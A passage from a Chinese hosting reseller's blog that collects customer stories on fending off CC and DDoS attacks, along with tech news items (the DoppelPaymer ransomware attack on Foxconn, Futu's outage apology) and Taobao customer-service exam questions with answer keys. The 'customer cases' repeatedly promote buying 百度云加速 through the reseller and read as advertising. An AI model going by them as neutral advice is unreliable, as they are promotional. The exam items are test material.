CloudFlare同套系统的,效果应该特别好,所以综合考虑我们选择了百度云加速。 一开始买了百度云加速的专业版使用,开启百度云加速的CC防护强力防护模式后,还真的防御住了CC攻击,用了一天后查看报表,我的乖乖!居然拦截了2亿次攻击!最高峰值高达2000万次!对方是有多恨我们呀! 但百度云加速的CC防护强力防护模式有个不好,就是单个IP首次登陆网站后会显示有5秒的安全检测,虽然对正常访问不会有什么影响,但多多少少会有些影响用户体验,而且由于5秒跳转导致微信是无法直接打开网站的,因为微信是禁止网页跳转的,这对我们网站有点伤,联系百度云加速后,在他们的推荐下我们又升级了商务版,商务版提供超级清洗功能,可以让官方自义CC防护规则,而且没有5秒盾,升级后终于解决了CC攻击问题! 最后一点点经验给到大家:买防护千万别买小服务商的,既浪费时间也容易把业务搞死,小服务商的高防可能会把你正常用户也拦截了,甚至可能把搜索引擎蜘蛛都给拦截了,那到时真的哭都来不及,而且我们发现百度云加速价格真的便宜,比那些小服务商的价格还便宜,但防御真的牛! #### 客户实操屏蔽各大IDC IP段可有效解决CDN被刷流量问题 最近一段时间,客户的网站遭到了大量刷流量的情况,导致百度云防护CDN流量消耗暴增,为此客户屏蔽了各类爬虫UA,都无法解决,每天流量还是大量的消耗。 由于刷流量的机器没有固定IP,也没有固定UA特征,导致Web应用防火墙无法针对性的做自定义访问策略。 客户偶尔听说拦截IDC的IP段可以大大减少被刷的流量,于是就尝试了下,果然流量大降。 不过主机帮查了下,拦截IDC IP段可能问题会很多,比如主机帮看了下宝塔用户的反馈,发现可能会拦截支付接口、百度APP错误等。 所以,建议针对腾讯云、百度云的IP段拦截慎重一点,可以考虑只拦截阿里云的IP段。 #### 客户成功解除了网站被河北通信管局屏蔽事件 上次说过某客户网站被河北通信管局屏蔽了,凡是河北用户打开网站都出现:安全警示 为此客户直接找上了河北通信管局,网址:https://hbca.miit.gov.cn/ 找到“局长信箱”   填写相关资料,然后等回复,以下就是客户申诉得到的回复,处理时间比较长,长达9天左右,各位同学可以参考下。 一般只要网站没有问题,通信管局那边都会解除屏蔽的,大家也别虚,别以为到了政府部门不好处理,其实只要站直都没多大事,当然如果你网站本身违法的,那就没办法了。 #### 客户案例:电商网站使用百度云加速的真实经历 我们这个项目是电商网站,每个商品详情页都包含不少图片,图片是保存在阿里云的对象存储OSS上面。如果直接挂上OSS的直链地址,外网流出流量不便宜。所以为了降低费用,2016年以前,一直在使用免费版的百度CDN,不限流量,基本还算稳定,同时OSS的流量费用大幅下降(因为CDN缓存住了图片),并且CDN还可以全国访问提速,性价比很高。 后面随着网站访问量越来越高,百度云加速也推出了专业版套餐,1990元/年,每天200GB流量,而免费版也开始限制流量了,我们统计了一下,每天200GB是满足需求的,即便增加1990元/年,也远远比单纯的OSS外网流量便宜得多。当时OSS的单价不记得了,即便是用现在的单价来计算,0.5元/GB(忙时),0.25元/GB(闲时),一年下来也要好1万多的费用的。因此很自然的就买了百度云加速的的专业版套餐。使用了一年,我们又续费一年。没过多久,网站发展到每日要跑500GB的图片流量,因为百度云加速的企业版套餐要19990元/年,正好是每日500GB,于是我们升级到了企业版套餐(因为是老用户,升级是半价,即9990元/年)。 到这个阶段有个事发生了,因为我们实际流量超出了每日500GB,我们又买了一个大流量包,补充一下每日多出来的那部分,但是跑了一个月,发现流量包丝毫没有减少,经过询问客服,原来是因为我们是老用户,所以不仅当时续费是半价,流量还翻倍了,即每日1TB,那这样我们就将流量包给退款了,以免过期失效。不得不说还是很不错的。 又使用了将近一年,图片流量逐渐上升,超过1TB,我们只好又买了个流量包。某天突然发现网站图片访问不了啦!一查,流量包用尽了。因为疏忽,没收到短信提醒。。。话说我们是用https访问图片的,然而又发现改成http后就正常了,我们还挺高兴,说过了当天,第二天流量重置再说。哪知道一晚上时间,OSS外网流量暴增,因为我们也买了OSS流量包,这回收到短信提醒了,也用尽。我们觉得很诧异,一查,才发现域名cname解析是指向OSS的,也就是说,所谓的http可以访问,是因为百度云加速流量耗尽后,cname直接回源了,而我们的OSS并没有配置https证书,所以https访问不了,只有http才能访问。于是乎赶紧又买了个小流量包顶着,然而等到晚上零点,百度CDN一直没恢复,因为ping域名就能知道,目前还是指向OSS的,这期间,我们也把流量临时给切到了阿里云的CDN上面。最后大概是2点才恢复的。 现在又到了快要续费的时候,百度云加速企业版已经涨价到24990元/年,但是提供5000的代金券,也就还是19990元/年,问了客服,因为是老用户,仍然是每日1TB流量。但是,越来越不可忽视的是OSS的外网流量费用,下面看我的分析。 图片使用的cdn流量分析: 百度cdn企业版+阿里云oss外网流量费: 百度cdn企业版(5000元代金券): 1、24990-5000=19990元/年,包含每月1T流量(去年是9990元购买的,现在翻倍了) 2、但我们平均每天流量在1.2T,超出套餐200G,所以需要加50T+10T*2流量包(9888元/年+2188元/年*2),基本满足一年的需求。流量包目前没有任何折扣。 3、阿里云oss外网流量费: 每月5T流量,流量包费用为22725元/年(官网7.5折),这里其实我有些不太明白,按上面的图来看,每天回源500GB(OSS外网流量),那一个月应该有15TB的OSS外网流量啊,但OSS那边统计确实是5TB左右,不管了,反正是OSS收费,当然越少越好。 每年总费用:19990+9888+2188*2+22725=56979元 后来我们在百度云加速交流群里无意中看到百度云加速的一个叫主机吧的代理商卖得居然比官方便宜一半,企业版一年1.2万,而流量费按9折收费,细算来下: 每年总费用:12000+12837.6+22725=36008.6元 一下子省了2万多!感觉以前的钱白花了,经了解到在代理购买的跟官方直接购买没任何区别,只是不能开官方发票,而且还可以直接在官网帐户上管理,于是心动买了也就买了一年。 现在已经稳定运行一年多了,打算再续一年,不得不说百度云加速确实不错,既可防御攻击也可以加速。 #### 客户案例:网站遭到大规模CC攻击后的应对方法 上周开始我网站遭受了一大波CC攻击,到目前为止仍在继续,作为一个建站小白,我感觉压力好大,又有新的问题要挑战了! 服务器架设在腾讯云,CC攻击很凶猛,带宽瞬间占满,于是在腾讯云后台配置安全组关闭了80端口,流量瞬间下来了。但是关闭80端口是一种自伤的方法,毕竟网站是需要80端口的。   怎么办?按网上教程,给服务器上装的安全狗。 不过安全狗也疯狂报警,服务器CPU并没有降多少。看来真正遇到问题时,安全狗也顶不住啊,在此鄙视一下。 看来只能花钱解决了,网上找到主机吧便宜购买了百度云加速专业版,成功接入 进入百度云加速域名管理,安全功能-ADS-CC防护:开启强力防护模式。 等待十分钟,服务器CPU果然降了,查看百度云加速报表拦截6898,不过目测攻击不只这么低,应该是百度云加速报表没及时新好。 到些CC防护成功,还得感谢百度云加速进行防御,如果买腾讯云的高防IP的话 价格死贵。 #### 客户案例:阿里云服务器网站被DDoS攻击解决经历 今天正常上班的时候,突然收到阿里云来的短信,具体内容如下: 我当时的心情是这样的:老子的网站终于有人来攻击了! 立即过去访问了我的网址,果然网页打不开。 然后就是按照预先的步骤来,登录SSH,发现无法登录,因为阿里云已经对服务器做了保护,等攻击结束再释放! 接着登录阿里云管理后台 峰值5.22G并不高,如何解决呢?按照阿里云官方提示,购买他们高防IP 看了下价格,那是绝望的价格,一个月20800,两万!果断不考虑!而且攻击峰值才5G根本用不着30G这么高。联系上朋友后推荐使用百度云加速。 价格便宜好多,专业版防御峰值10G,才2490元一年,非常合适!刚想在直接在官方买了,朋友说可以直接到主机吧买,价格便宜一半。还有这种好事?!马上百度搜:主机吧 咨询后,报价专业版1180一年,商务版4000一年,企业版1.2万一年!简直不要太便宜,我都怀疑是假的。得知可以在官网帐户上直接管理并且可以淘宝交易后,果断买了一个专业版套餐。 给阿里云服务器更换了新IP后,成功接入百度云加速并把域名真实IP隐藏起来了,现在ping已经找不到我的服务器IP了。 网站也恢复了正常,经过两天的观察,一切正常!没有再被攻击大型DDoS攻击的现象,倒是有一些CC攻击,不过不影响网站运行。 经过这件事后得到一个教训,不管什么网站,防攻击还是要做好,说并定哪天就遇到被攻击,现在互联网上敲诈勒索事件那么多,前几天美国某小镇还被黑客勒索呢。网站防攻击很简单,给网站上个百度云加速就行,阿里云高防IP就算了,太贵,估计那不是给网站用的,而且给APP或者大型网站金融公司用的,小网站用不起。 #### 客户的20年老站卖了 最近,主机帮的一个多年的客户把网站卖了,而这个网站的域名年龄高达20年,是一个非常好记的双拼域名。 为什么卖掉网站呢? 其实还是因为网站不赚钱了,进入2024年后,很多老网站的流量大减,尤其是今年清明节的时候,百度来了一次大降权,几乎所有网站的流量都直接砍半,至今都没有恢复的迹象。 而新站的流量也少得可怜,主机帮很多客户都直接不做了,主机帮在站长论坛发现,建站公司也很多客户不续费了。 真的太惨了,这两年不管哪个行业都不是很好过。 #### 客户经历:网站几种免费防御CC攻击的方法 CPU,带宽同时上升,一般可判断为被攻 站长做网站最怕碰到几件事:搜索引擎不收录,收录的关键字掉排名,网站被恶意攻击。其中最头疼的是被攻击,你不知道谁攻击了你的站,或为什么要攻击你的站。站点被攻击时候CPU100%,带宽跑满100%,那种烦躁的感觉只有被攻击过才能感知。 攻防好比古时候打仗,只是战场残酷残忍,不是你死就是我活。互联网很平静,但更多的是经验,技术,金钱的较量,和战场不同,攻击比较容易,防御却比较麻烦或困难,现在的攻击一般DDOS和CC攻击居多。 两种攻击我们都经历过N次,但区别不同。DDOS攻击的时候如果防御足够,是可以抵挡住的,现在的空间商大都提供了5-30G防护,一般的攻击是可以防住的,本身攻击者也是需要成本,所以不会持续太久。一般攻击者把服务器打入黑洞停止。(服务器完全隔离网络)但半小时或一小时后自动会解封,或换IP都可以防DDOS攻击,但CC攻击不同,他不会直接把你打死,更多的是攻击者模仿正常的访问,消耗服务器的资源,CPU和服务器进入流量持续90%以上,造成网络堵塞或服务器CPU跑满,从而导致站点无法访问。如果用钱防,当然可以防住。但大部分个人站长本身的站不赚钱,也就没有必要花大钱去升级配置。小编亲测几种免费防御策略,基本还是能抗住。 1,百度云加速官方:https://su.baidu.com/ 基本可以防住,但缺点也有。首先需要备案域名接入,通过CDN分发,再CC防护设置强力保护。CPU和带宽马上下降,访问正常。免费版CDN每天只有10G流量,如果攻击比较大,可能几个小时就会跑完10G流量,然后被打回直接解析到IP,攻击持续,又会无法访问,不过可以购买收费版每天100G的继续防御,价格不贵,在主机吧买的话一年也就1180元,性价比相当高,特别推荐! 百度云加速 2,服务器装安全狗服务器版。官方:http://www.safedog.cn/ 下载服务器版的时候会同时安装网站安全狗,强烈建议删除网站安全狗,只装服务器版就可以了。如果没有攻击 的时候,网站安全狗挺好用,除了防小流量CC攻击,也可以同时防站点被挂马,但当被CC攻击量比较大的时候,反而会占服务器资源。安装服务器安全狗后,先查看日志,是固定IP攻击还是代理IP攻击。如果是固定IP攻击,通过IP策略封IP便可。(百度下IP策略)一般大流量攻击可能会来自某些机房,这个时候截图你的攻击日志联系对方空间商,让他们帮你阻止便可。但更多的可能是代理IP。如果怕误封IP造成网民无法访问,在大流量攻击的时候可以开启WEB防火墙的高级模式。也就是用户每次访问需要先点击认证才能正常访问。这个方式基本可以抗住了攻击。我们就是用的这个方式抗住了。等攻击停止的时候在设置回到初级模式便可。 安全狗服务器版界面 3,知道创宇 官方:https://www.yunaq.com 也是需要备案才能接入域名,和百度加速云的模式差不多,但小编一开始接入的是这家,效果不理想,然后切换到百度加速云才抗住了。也许是我们设置不对。当然优点也明显,可以分省,分线路解析,如果攻击都是来自一个地区,只要不解析这个地区便可。 创宇设置界面 4,360 官方:http://wangzhan.360.com/ 和生病乱投医一样,在被攻击的时候,我们也会去尝试各种解决办法。攻防本身是门技术活,但同时也能让你学到很多。360也需要域名备案后接入。但和创宇一样,我们使用后效果不是很理想,也许是我们设置的方式不对。360应该是抗DDOS比较厉害,CC可能也是弱项。 360界面 当然除了这几种常用的方式,其他也有很多方式可以抗CC,linux下可以设置规则,WIN下动态IP限制可以设置参数。 因我们的站是动态数据库查询,所以很容易被CC打死,如果是静态HTML的,可能就相对更好防。如果投钱防就容易,购买防护,增加配置,服务器负载,采用云数据库等。上面介绍的百度,和安全狗是比较简单上手,适合不需要复杂设置的站长。当然如果你的站本身不赚钱,一直持续被攻击,小编还可以给你更厉害的招,躺下装死,随便他攻击。迟早有天攻击的人会累。当然小编也想说,和气生财,不要动不动就攻击,就像年轻时候动不动打架,但到了一定的年纪,什么都看开的时候,就不会这么干了。 #### 客户网站IP暴露不更换IP的情况下解决CC攻击方法 最近主机吧遇到一位客户网站被CC攻击了,主机吧给他接入了百度云加速商务版进行防御,不过等生效后,发现并没有效果?! 主机吧查看了下CDN报表,发现并没有多少请求访问至百度CDN节点 但是监控服务器发现CPU一直处在100%负荷状态的 登陆服务器后发现有大量请求源于PHP,一开始我们以为是中毒了,后来查看了下网站响应日志发现有大量非百度云加速IP从网站流入,而且这些IP大多是阿里云的IP 由此可见有黑客利用阿里云服务器大量非法请求客户网站,也就是CC攻击。而且对方是直接通过源服务器IP进来的,也就是绕过百度云加速了。 那要怎么解决呢?我们建议客户换服务器IP,然后用百度云加速隐藏起来就可以了。 不过客户反馈说服务器是在西部数码的,不支持换域名。那我们可以用安全组的方法,把所有入网的IP都禁止访问了,只允许百度云加速IP段进入。 增加一条安全组规则拒绝所有IP入网,再添加百度IP段白名单,如下图 然后把安全组部署上服务器上即可。   然后我们再查看监控,CPU立马降下来了 有同学会怕禁掉所有IP进入后,网站打不开,实际上只要你把百度的IP段全放行,访问是正常的,而且搜索引擎蜘蛛是抓取百度节点的,而不是抓源服务器。   需要注意的是启用安全组的时候记得要把你自己的IP放行,否则你会连自己都无法连接源服务器。 #### 客户防御案例:百度云防护为某分类信息网拦截CC攻击案例 这位做分类信息网客户这两个月以为,每隔几天就会遭遇CC攻击。 上周没有攻击,本以为那黑客放弃了,结果本周五晚上11点左右,又来攻击了。 攻击不大,主打就是一个高频率,还好客户部署了百度云防护拦截,否则有点烦了。 CC攻击不仅会使网站变得卡慢,甚至打不开,严重的影响搜索引擎蜘蛛访问,从而被搜索引擎降权,消失在搜索引擎上,通常是国内一些同行网站为了打击对手使出的黑手。 所以,主机吧建议平时要做好防御,否则防不胜防,推荐使用百度云防护进行安全加速服务,百度云防护不仅可以加速网站访问,还可以对程序安全防御,DDOS、CC攻击防御,非常划算的。 #### 富士康遭遇黑客攻击,索要 2.3 亿元赎金! 今年的感恩节有点特殊,作为美国的邻居加拿大跟墨西哥双双遭遇了黑客攻击。一边是破坏城市交通网络,另一边则是瞄准了苹果最大的产品制造商——富士康。 据外媒 BleepingComputer 报道,富士康在墨西哥的一家工厂遭受了名为 DoppelPaymer 勒索软件攻击,黑客在此之前偷窃了未加密的文件,进而在入侵之后对设备进行了加密处理。 近日, DoppelPaymer 勒索软件在其勒索软件数据泄漏站点上发布了属于富士康的文件。泄漏的数据包括常规业务文档和报告,但不包含任何财务信息或员工的个人详细信息。 对此,有网络安全研究员证实了这一消息,富士康于 2020 年 11 月 29 日前后在其位于墨西哥华雷斯城的富士康 CTBG MX 设备遭受了攻击。 该工厂于 2005 年开始运行,富士康将其用于向南美洲和北美洲的所有地区组装和运输电子设备。 自受到攻击以来,该设备的官网已关闭,目前已经打不开。 攻击者要求赎金 3400 万美元 此外,消息人士分享了在攻击期间黑客在富士康服务器上创建的勒索记录,如下所示。 勒索信里面附有指向 DoppelPaymer Tor 付款网站上富士康受害者页面的链接,黑客索要 1804.0955 个比特币的赎金,按今天的比特币价格折算,约合34,686,000 美元(2.3亿人民币)。 DoppelPaymer 勒索软件团队在采访时证实,他们的确在 11 月 29 日袭击了富士康在北美的工厂,但并未袭击整个公司。 作为此攻击的一部分,黑客声称其已加密了约 1,200 台服务器,窃取了 100 GB 的未加密文件,并删除了 20-30 TB 的备份。 DoppelPayment 透露此次攻击的范围,并表示:“我们加密了北美的服务器,并不是整个富士康,其中大约涉及到 1200-1400 台服务器,这并不单单是工作站。另外,它们还有大约 75TB 的其他项备份,我们销毁了大约 20-30 TB”。 截止目前,富士康尚未回应。 #### 富途证券因香港将军澳多机房网络故障出现资产清零、无法交易等故障 2021年10月9日凌晨,富途证券被爆因网络异常出现系列故障,包括资产清零、无法交易等。 富途证券创始人兼董事长李华是腾讯第18号员工。于2000年加入腾讯,在腾讯的8年时间里,李华在市场、运维,产品、管理等岗位都呆过。李华发明了23项国内和国际专利,同时也是QQ产品重要参与者和腾讯视频创始人之一,领导过腾讯视频产品设计和开发。 10月11日,李华以“叶子哥”的身份发布《关于2021.10.9凌晨交易中断事故的道歉和回复》文章,以下为全文。关于2021.10.9凌晨交易中断事故的道歉和回复 10月9日凌晨1点26分,事故发生后不少客户at我,有批评、有建议、有鼓励,由于9号早晨还要去出差,会有几个小时在飞机上,就没来得及一一回复。不论如何都要谢谢你们,因为你们,我才觉得富途所作的事情格外有意义,我们可以去努力和改善的地方还有非常多。 首先我要向大家郑重及诚恳地道歉:真的很对不起,让你们失望了,我们虚心接受所有的批评和建议,并会立即着手相应的改进。 虽然几次影响大、耗时长的事故都与不可控的外部依赖有着直接的关系,但给到客户的感受都是一样的,那就是富途的服务不可用了。因此,我们责无旁贷,也不会把应该我们解决的问题推到外部,只会看在我们可控的范围内如何可以做得更好。 1、末日期权价值归零的补偿问题。 有购买了末日期权因故障未能及时平仓导致价值归零的客户在问是否会补偿,从周末开始针对这类客户我们的客服已经在逐一联系,会根据具体的情况沟通对应的补偿方案。 2、有关系统容灾的问题。 首先可以确定的是,富途的系统是有作容灾设计的,从行情到交易,从服务器到交易网关到网络传输都有作双路或多路的冗余设计。不同的子系统的设计会有所不同。富途的客户中不乏技术达人,这次事故后,不少有技术背景的客户针对系统的容灾给了各种的建议,尤其是有关多区域多IDC的容灾建议。在此表示感谢!以行情为例,单向传输为主、对时延的敏感度也不是那么高,我们很早就作了多区域多IDC的容灾设计;尤其像美股行情,涉及到越洋传输,为避免中断,我们选择了全球顶级的两家行情供应商为我们分别提供行情源,分别从美国、香港多地多点接入,当这些都不可用时,我们还保留了富途美国IDC直传的能力。不考虑其他的冗余设计,光是因为行情源的冗余,一年增加的成本过千万港元。交易系统比较特殊,对时延有着非常高的要求。所有的多路冗余热备系统都存在时延大小和数据一致性的冲突;物理位置越分散,比如跨IDC、跨区域,为确保数据一致性,时延就会越大。跨IDC、跨区域的数据一致性的时延问题好解决吗?不好解决。因为在我们生活的这个宇宙,光速或电子流动的速度每秒钟30万公里就已经是极限,这也意味着在理论状态下物理位置每间隔300公里的网络传输就会存在1毫秒的时延;这还仅仅是在理论状态下,实际上如果加上光电转换、加上路由跳转,300公里的传输能作到不超过5毫秒已是优秀。那么5毫秒算长吗?5毫秒从一般的认知来看也不算长,但对于数据一致性来说就算很长了,光一个网络传输一来一回就是10毫秒;就具体的交易场景来说,你可能啥也没作,只是因为热备的数据一致性的需要,网络传输延时加上各类写操作的延时和同步确认的延时,你的订单还没有提交出去可能就消耗掉了几十毫秒,且这还只是理论值,实际上有机会更多。基于上边的描述,在实时热备的多路冗余交易系统的设计上会面临着两种选择。一是较差的交易性能更大的订单延时但更好容灾能力的跨IDC多路冗余方案,二是更好的交易性能较小的订单提交延时单一IDC的多路冗余方案,但IDC本身会成为故障的单点。有客户问,你们是不是不愿意投入啊,才会有这个事故发生;看到这里,你会发现其实不是投入的问题,是选择的问题。考虑到IDC的建设标准,IDC的大级别事故是罕见的,尤其是在电力故障方面。经过综合推演之后,我们选择了更好性能的方案二作为我们的系统设计,也因此留下了IDC的单点故障隐患。这次事故恰恰就是IDC出了问题,而且是最不应该出现问题的电力系统出了问题。供电网络一个几秒钟的电压抖动,IDC一堆网络IT设备跟着关机或重启,实在是难以想象,说好的不间断电源和柴油发电机去哪了?不间断电源和柴油发电机竟然都没能发挥应有的作用,要知道电力保障是一个IDC之所以是IDC的最基础能力。另一方面也暴露了我们的系统在这种情况下的脆弱。这次事故的恢复时间以小时计,给我们的教训和启发都非常大。两害相权取其轻,相对于小时级的故障时间,假如我们可以接受一个分钟级的故障时间,那么在方案二的基础上是不是可以有一个兼顾交易性能低订单延时又支持跨IDC的准热备方案呢?答案是有的,接下来我们就会对这里作进一步的研究和推进。 3、有关资产显示的问题。 这次事故让我看到了我们在产品设计上的一些欠周到。事故发生时,有客户发现自己的持仓和资产数据都没了,这让人感到非常惊悚,马上就有人在牛牛圈上问“富途是不是卷款跑路了?”。实际情况是因为故障导致了牛牛app跟后台数据的断开;既然只是断开,那前端app的表现为何是作清空的处理?显然以最后可以正常显示的数据快照继续展示会是更好的实现方案;虽然数据不会作实时更新了,但给到人的心理感觉会安定很多。在这里我要给受到惊吓的客户们道歉,接下来也会在app相关的表现上作出改进。以上是我想要重点回复的三个问题。这次事故值得我和团队们总结和反思地方非常多,教训和警示也都非常深刻。我们不会去做无意义的辩解,立足当下作好改进会来得更重要;我们也从未因为富途有了一点体量和成绩就感到自大和自满,只期望通过我们的持续努力不辜负您们的信任。再次道歉并感谢!叶子哥2021/10/11 根据富途10月10日晚间回应,此次事故的主要原因,是富途在香港将军澳的托管机房电力闪断导致的多机房网络故障。 事实上,由于将军澳机房靠近香港交易所机房,一直是众多香港金融机构的机房托管首选地。有业内人士表示,此次除了富途之外,还有多家券商也受到了机房电力闪断的影响,只是富途的关注度更高。 这次事故也显示,券商在同城或跨城备灾,防范恶劣天气方面,仍需更多努力。 据李华介绍,富途从行情到交易,从服务器到交易网关到网络传输都有作双路或多路的冗余设计,不同的子系统的设计会有所不同。 例如行情方面,以单向传输为主、对时延的敏感度也不是那么高,因此富途作了多区域多IDC的容灾设计,选择了全球顶级的两家行情供应商分别提供美股行情源,分别从美国、香港多地多点接入,并保留富途美国IDC直传的能力。 但交易系统比较特殊,对时延有着非常高的要求。而所有的多路冗余热备系统都存在时延大小和数据一致性的冲突。因此在实时热备的多路冗余交易系统的设计上,券商会面临着两种选择。 一是较差的交易性能更大的订单延时但更好容灾能力的跨IDC多路冗余方案,二是更好的交易性能较小的订单提交延时单一IDC的多路冗余方案,但IDC本身会成为故障的单点。可见,不管是哪种方案都有着其固有弱点,券商只能综合判断进行选择取舍。 #### 对标华为“鸿蒙”没戏了?谷歌Fuchsia OS部门遭遇裁员重大打击 谷歌的Android安卓系统已经发展了10多年,做到了全球最大的移动平台,然而安卓很多设计及技术已经落伍,谷歌前几年搞了个全新的Fuchsia OS系统,一度被视为要取代安卓,对标华为“鸿蒙”万物互联系统,但在谷歌最新的大裁员中,Fuchsia部门又遭遇了严重的打击。 上周谷歌也宣布了史上最大规模的裁员,大约有1.2万员工将离职,占了全球员工总数的6%,要知道过去6个月中谷歌已经在各种削减成本,这次的裁员可以说雪上加霜。 不同部门受裁员的影响不一样,但是对Fuchsia OS部门来说这波裁员是一次严重的打击,400多人的部门中16%的员工受到影响,系统开发难免会因为人手问题而遇到各种难题。 这样下去,Fuchsia OS取代安卓的希望更加渺茫了。 从这次的裁员来看,谷歌内部对Fuchsia OS的前景显然也是有些悲观的,这个项目多年来备受期望,但实际表现是雷声大雨点小,就算有产品使用Fuchsia OS,也主要是一些智能家居产品,智能手机上一直没有推广,无法撼动安卓的地位。 #### 对电玩破解软件动手 淘宝:将下架电玩破解类工具商品 29日起开始处罚   7月25日消息:近日,淘宝官方发布公告,将对电玩破解类商品进行整顿。此次整改对象为所有涉及绕过正常服务并提供免费安装和使用游戏的破解、自制工具或系统的商品。 淘宝称,为保护正常有序公平的商家经营秩序及消费者权益,淘宝电玩行业将在近期开展针对破解类违规商品的专项整顿,请各位卖家对店铺商品进行自查自纠,及时整改,避免受到平台处罚。 同时,淘宝方面称,此次整改范围包括商品链接、商品SKU、商品标题、商品详情页及淘宝其他信息交流渠道。对于违规信息请及时删除和下架,并避免再次发布此类违规商品。 目前,淘宝要求所有商家自查自纠, 29 日起开始处罚。 #### 对站长来说是好事!知乎PC网页端非登录用户限制查看回答全文 根据最新消息,知乎对非登录用户在PC网页端访问知乎时,已限制查看回答的全文内容。 主机吧测试当用户尝试点击展开阅读全文”时,系统会自动弹出登录窗口,而非登录用户无法直接浏览全文。 在2022年3月,工信部针对部分网站强制用户下载App才能浏览全文的问题,召开了行政指导会,督促相关互联网企业进行整改,并明确指出: 未经用户同意或主动选择,不得自动或强制下载App;不得要求用户不下载App就不给看,或者不让看全文。 不过,两年多过去了,国内的大厂显然没有按要求来,比如百度贴吧、微博、百家号等都没有强制下载APP才可以查看的情况。现在知呼也搞这种,看来这个政策并没有什么强制性效应。 这些大厂强制登陆或者下载APP对个人站长来说是有好处的,比如知乎,搜索引擎排名太高了,而且内容质量都不差,如果强制登陆才可以访问,用户可能因为需要登陆而放弃继续浏览,继而访问其它网站,这样挺好。 #### 寺库疑似跑路?人去楼空,不发货不退款 8 月 17 日消息,据北京商报今日报道,曾经摆满了奢侈品的寺库大厦如今已经空空如也,同时有安保人员称,半年前寺库大厦就已开始搬东西,现在大楼 1 至 4 层均已搬空,仅剩 5 层还有部分工作人员。此外,寺库位于亦庄的物流仓库中心越海全球物流也已经搬走。 而在近段时间,消费者对寺库平台的声讨也没有停过,仅根据黑猫平台的数据来看,就有 1 万 7 千多条投诉,而其中大多数的关键词为:不发货、不退款。 “北京寺库商贸有限公司”成立于 2009 年 4 月,注册资本 1000 万元。2017 年 9 月,寺库美股上市,主打奢侈品,商品涵盖包袋、腕表、服饰、珠宝首饰等,曾经还被誉为“中国奢侈品电商第一股”。 但从寺库递交的 2021 年报显示,集团全年营收为 31.32 亿元,较上年同期的 60.2 亿元下跌 48%,净亏损达到 5.66 亿元,同比扩大 6 倍。而目前,寺库的市值仅有 1774 万美元,巅峰时期市值则为 7.7 亿美元,市值缩水近 98%。 此外,寺库在一年内两次被申请破产,在 2022 年这半年多年的时间,寺库有上百起买卖合同纠纷,且大部分为被告方。在 7 月 27 日,普拉达时装商业(上海)有限公司还申请冻结了寺库旗下全资子公司上海寺库电子商务有限公司名下 1100 万余元及相应价值的财产,并且现在已经开始实施,期限为 1 年。 在 2022 年 3 月,寺库宣布已与 Great World Lux Pte 公司签署 1.75 亿美元的再融资协议。但据北京商报报道,广科咨询首席策略师沈萌指出:再融资只是借旧换新,在一定程度上可以视作以新的条件重组原来的借款,对寺库来说可以延缓债务偿还到期的压力,但并不会从根本上减轻偿债的负担。目前寺库的前景不容乐观,投资者也很难对寺库的预期改观”。 对于寺库出现当下局面,时尚透明度创新中心发起人杨大筠认为,“寺库的商品价格却比品牌专卖店便宜很多,这是奢侈品品牌方不愿意看到的,因此奢侈品集团们一定程度上也会去制约寺库这类平台的发展”。他还指称,“货品的利润差则需要由寺库自己填补,长期以往,寺库是抵抗不住现金流和库存压力的”。 但现在寺库 App 仍可正常下单购物,且还在进行着各种优惠活动。 #### 将“知乎回答”作品改编成短视频被法院认定为侵权 7月3日 消息:在知乎平台上,看到问题后,会有人写出自己的答案,回答精彩的人会获得高点赞数。但这些回答问题的人不知道,在不知不觉中,自己的版权就有可能被侵权了。 辛先生在“知乎”网站某网帖下发表了以自己的真实经历为内容创作的文字回答,后发现该文字被改编成短视频。辛先生诉称, 2016 年 11 月 24 日,其在“知乎”网站标题为“有哪一瞬间让你觉得被撩到或者成功撩到别人?”的网帖下,发表了以自己的真实经历为内容创作的文字回答(下称权利作品),依法享有著作权。 2017 年,辛先生发现新片场公司在新浪微博账号“小情书LOVOTE”所上传的播放量超过 1400 万次的《第一天的开始,一辈子的坚持》短视频(下称被诉视频)在人物设置、台词、故事情节等方面都和辛先生发表的权利作品一致,同时该被诉视频也在腾讯网、优酷网进行了上传。后据辛先生了解,被诉视频是新片场公司委托王先生摄制的。辛先生认为,新片场公司和王先生不仅共同侵犯了其对权利作品享有的摄制权,还与新浪微博的运营方微梦公司共同侵犯了其对权利作品享有的信息网络传播权。 于是,辛先生诉至法院,要求新片场公司删除在优酷网上发布的被诉视频,同时要求三被告共同赔偿其经济损失 50 万元及合理开支 13709 元。 法院经审理后认为,原告辛先生主张权利的内容为发表于知乎网上的一段关于“有哪一瞬间让你觉得被撩到或者成功撩到别人?”的文字回答,虽然篇幅较短,但通过一系列的人物设置及情节串联等完整的描述了男女主角之间的爱情故事,其既不属于思想范畴也不属于有限表达,在文字内容的创作上体现了独创性,属于独创性表达,且可以通过有形形式复制,故应被认定为我国著作权法上所列举的文字作品。辛先生提交的相关证据,可以认定其为权利作品作者,享有权利作品的著作权。 日前,海淀法院审结了此案,法院判决被告新片场公司停止侵权,与被告王先生共同赔偿原告辛先生经济损失 5 万元及合理开支 13709 元。 #### 小丽是一家天猫店铺的客服,消费者咨询小丽购买的商品是否可以开发票 淘宝售前咨询规范考试题: 小丽是一家天猫店铺的客服,消费者咨询小丽购买的商品是否可以开发票,小丽发现店铺里本月的发票已经用完了,次月十日才能领取到新发票,小丽应该如何告知消费者? A如实告知消费者,发票已经使用完,下月十号领取到发票会开好免费快递给消费者 B告知消费者,无法开具发票,可以开收据免费快递给消费者 C如实告知消费者,发票已经使用完,下月十号领取到发票会开好到付快递给消费者 D如实告知消费者,发票已经使用完,是否可以用其他等额的收据代替 正确答案: A 备注: 发票问题-由于商家原因造成的无法开具发票,应该在可以开具的承诺日期内无条件开发票给消费者并且承担发出运费   #### 小兵是一家天猫电器城的售前客服,消费者准备在店铺里购买一台3000元的电冰箱 淘宝售前咨询规范考试问题 小兵是一家天猫电器城的售前客服,消费者准备在店铺里购买一台3000元的电冰箱,但是价格比较贵,想咨询小兵是否可以信用卡分期付款,小兵应该如何处理? A查看商品是否参加信用卡分期活动,如有活动就提示消费者在商品页面选择信用卡分期,如没有则表示不能进行信用卡分期 B告知消费者可以信用卡付款,但是不可以信用卡分期付款 C告知消费者店铺不能信用卡付款,没有开通信用卡付款功能 D告知消费者可以用信用卡付款但是只能用分期付款,一次性信用卡付款不可以使用 正确答案:A  备注: 信用卡分期付款规则-信用卡分期付款   #### 小张是一家天猫店铺的售前客服,店铺为了方便消费者开通了货到付款业务 淘宝售前咨询规范考题: 